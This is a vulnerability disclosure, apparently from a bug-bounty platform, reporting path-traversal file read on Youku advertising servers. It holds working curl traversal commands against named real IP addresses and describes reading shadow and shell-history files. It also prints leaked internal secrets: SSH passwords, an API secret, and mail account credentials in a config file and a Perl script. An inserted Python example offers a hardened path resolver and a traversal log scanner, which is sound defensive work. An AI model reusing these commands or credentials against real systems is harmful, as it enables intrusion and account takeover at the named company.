2014-12-01: Details reported to the vendor, awaiting vendor response
2014-12-01: Vendor has confirmed; details disclosed to the vendor only
2014-12-11: Details disclosed to core white hats and experts in related fields
2014-12-21: Details disclosed to regular white hats
2014-12-31: Details disclosed to intern white hats
2015-01-15: Details disclosed to the public
Youku: arbitrary file read on a series of servers and internal information leakage
Several servers of the advertising system are affected. Arbitrary files can be read, and the read runs with root privileges.
Below are the affected servers collected so far.
curl http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
curl http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1
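The root cause above is a static-file handler that maps the raw request path onto the filesystem without rejecting ".." segments, so the server walks out of its document root. The following Python is an added example written for this page; it is not the report author's code and not Youku's or the ad-system vendor's. It shows the two things a defender wants here: a hardened path-mapping routine that refuses traversal (including percent-encoded dots and symlink escapes), and a small scanner that flags traversal attempts in access logs. The log lines, the IP addresses in them and the "/srv/www" webroot are constructed for the example.

```python
import os
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines in common log format (made up for this
# example; not taken from the report or from any real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Dec/2014:10:00:01 +0800] "GET /x.gif?ts=1 HTTP/1.1" 200 43
10.0.0.6 - - [01/Dec/2014:10:00:02 +0800] "GET /../../../../../../etc/passwd HTTP/1.1" 200 1203
10.0.0.7 - - [01/Dec/2014:10:00:03 +0800] "GET /static/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 200 901
10.0.0.8 - - [01/Dec/2014:10:00:04 +0800] "GET /static/css/site.css HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def fully_decode(value: str) -> str:
    """Percent-decode until the string stops changing, so that double-encoded
    forms such as %252e%252e are normalised before inspection."""
    while True:
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded


def has_dotdot_segment(path: str) -> bool:
    """True if any path segment (split on '/' or '\\') is exactly '..'."""
    return any(seg == ".." for seg in re.split(r"[/\\]", path))


def safe_resolve(webroot: str, request_path: str) -> Optional[str]:
    """Map a request path onto webroot; return None if it would escape.

    This is what the vulnerable handler should have done: decode once (as the
    server does), refuse any '..' segment outright, then confirm the resolved
    real path is still under the real webroot, which also catches symlinks
    inside the document root that point outside it.
    """
    decoded = unquote(request_path.split("?", 1)[0])
    if has_dotdot_segment(decoded):
        return None
    root = os.path.realpath(webroot)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    return candidate


def scan_log(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (ip, decoded_path, status) for every request whose decoded path
    contains a '..' segment. A 200 status on such a request is the strongest
    signal, because it means the server actually served the file."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        path = fully_decode(m.group("path").split("?", 1)[0])
        if has_dotdot_segment(path):
            hits.append((m.group("ip"), path, m.group("status")))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("traversal attempt:", hit)
    print(safe_resolve("/srv/www", "/static/css/site.css"))
    print(safe_resolve("/srv/www", "/../../../../etc/passwd"))
```

Rejecting a request that contains any ".." segment, rather than normalising it away, is the deliberate choice here: a legitimate client has no reason to send one, and refusing it keeps the log record of the attempt unambiguous for the scanner above.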
Taking one of these servers as an example and going further: read shadow.
Read the shell history.
Using the history, read the various configuration files.
# -*- coding: utf-8 -*-
[auctionserver_default]
# installation root directory
rundir = /opt/workspace/exchange1.2/auctionserver
# mode (prod/dev)
mode = "prod"
# number of verticles accepting requests
mainCore = 8
# number of verticles connecting to the DSPs
beaconCore = 8
# auction server domain names, used to validate the Host header of HTTP requests
serverHosts = ["c.miaozhen.atm.youku.com","b.miaozhen.atm.youku.com"]
# auction server port
port = 80
# port of the API exposed to the Exchange website
apiPort = 8080
# default impression tracking address
impAddr = "http://n.miaozhen.atm.youku.com/x.gif"
# default click tracking address
clickAddr = "http://n.miaozhen.atm.youku.com/r.gif"
# cookie key holding the user id
mzCookieName = "__ysuid"
# connection pool size per DSP; with multiple beacons this is effectively multiplied by the beacon count
clientPoolSize = 100
# maximum length of the HTTP pipeline queue
clientMaxPipelineSize = 200
clientConnectionTimeout = 300
serverIdleTimeout = 700
# whether a service fee is required
needServiceFee = "false"
# password for special requests
secret = "miaozhen1234"
isNoticeInPm = "true"
# whether to check the domain; takes precedence over the website's configuration
isCheckDomain = "true"
isCheckHost = "false"
isCheckToken = "false"
token = "testToken"
# switch for Youku-specific features
isYouku = "true"
useIPsClient = "true"
# dmp
isDMP = "false"
dmpHost = "127.0.0.1"
dmpPort = 6379
dmpKey = "YK_"
dmpSep = ","
# address of the Exchange website
websiteHost = "miaozhen.atm.youku.com"
websitePort = 80
websiteIps = ["220.181.154.177", "123.126.99.87", "10.103.255.174"]
websiteHeaderHost = "miaozhen.atm.youku.com"
# registration API, do not modify
registerApi = "/server/api/addAuction"
# budget request API, do not modify
budgetApi = "/pull/api/budget/take"
# address of the Redis that auction logs are written to, local by default
redisHost = "127.0.0.1"
redisPort = 6379
keyBudget = "exchange_auction_budget_backup"
# root directory for log output
auctionDataDir = "/opt/data/backup/exchange1.2/auctionserver"
# whether to show system logs
isShowLog = "true"
# number of days to retain logs
logReservedDays = 30
mappingRMUrl = ""
budgetPort=8281
budgetHost="miaozhen.atm.youku.com"
mappingDmpPort=6380
mappingDmpHost=""
mappingDspQps=1
mappingDspUrl=""
mappingDspId=""
forwardPath = "/"
forwardPort = 1234
forwardHost = "127.0.0.1"
isForward = "false"
heapSize = 10
# start and stop related scripts
start = bash bin/start.sh
stop = bash bin/stop.sh
check = bash bin/check.sh
restart = bash bin/restart.sh
start_retry = bash bin/start_retry.sh
stop_retry = bash bin/stop_retry.sh
backup = bash bin/backup.sh
# password of the target installation machine
#sshpass = "123456"
# port of the target installation machine
sshport = "1111"
[auctionserver_01]
# user and host name (ip) of the target installation machine
node = [email protected]
sshpass = "ocf(*XzhWt4K"
# auction server name
serverName = "a05.exchange.ad.b28.youku"
[auctionserver_02]
# user and host name (ip) of the target installation machine
node = [email protected]
sshpass = "isC*&7cjpZCW"
# auction server name
serverName = "a06.exchange.ad.b28.youku"
#[auctionserver_03]
## user and host name (ip) of the target installation machine
#node = [email protected]
#sshpass = "wzxJ^#jsQJKv"
## auction server name
#serverName = "a08.exchange.ad.b28.youku"
A few key file paths are listed below, without screenshots as proof.
/opt/workspace/exchange1.2/reportserver/run/start.sh
/opt/workspace/exchange1.2/reportserver/code/CMakeLists.txt
/opt/workspace/exchange1.2/reportserver/config/mergelog.list
/opt/workspace/exchange1.2/reportserver/config/reportserver.cfg
/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_new_config.ini
/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_config.ini
/opt/workspace/exchange1.2/auctionserver/conf/dsps.txt
/home/zczhao/warn/sendlog.perl
/opt/workspace/exchange1.2/thirdparts/redis-2.4.17/redis.conf
/home/zczhao/cron/reporttab
0 2 * * * /home/zczhao/clear/clear_log.sh
0 2 * * * /home/zczhao/clear/clear_bz2.sh
0 2 * * * /home/zczhao/clear/bz2_day.sh >> /home/zczhao/clear/history.log
#*/10 * * * * /home/zczhao/warn/disk_warn.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/run_dnscache.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/heartbeat_check.sh
*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/jmap.sh
/opt/data/backup/exchange1.2/reportserver/auction/log/bz2.sh
Among them, sendlog.perl contains an internal mailbox account:
my $mail_smtp = 'mail.youku.com';
my $mail_from = '[email protected]';
my $mail_to = '[email protected]';
my $auth_id = 'systeminformation';
my $auth_passwd = '111aaaAAA';
my $subject = "Warn from adExchange13 ($date).";
my $body = `cat /home/zczhao/warn/warn_log`;
Also, the source code can be downloaded as well: http://220.181.185.228/../../../../../../../../opt/workspace/exchange1.2/auctionserver.2014-07-16-07-52-30.tar.gz
Severity: High
Vulnerability Rank: 20
Confirmed: 2014-12-01 16:14
Thanks for the heads-up, we will fix it right away.
None yet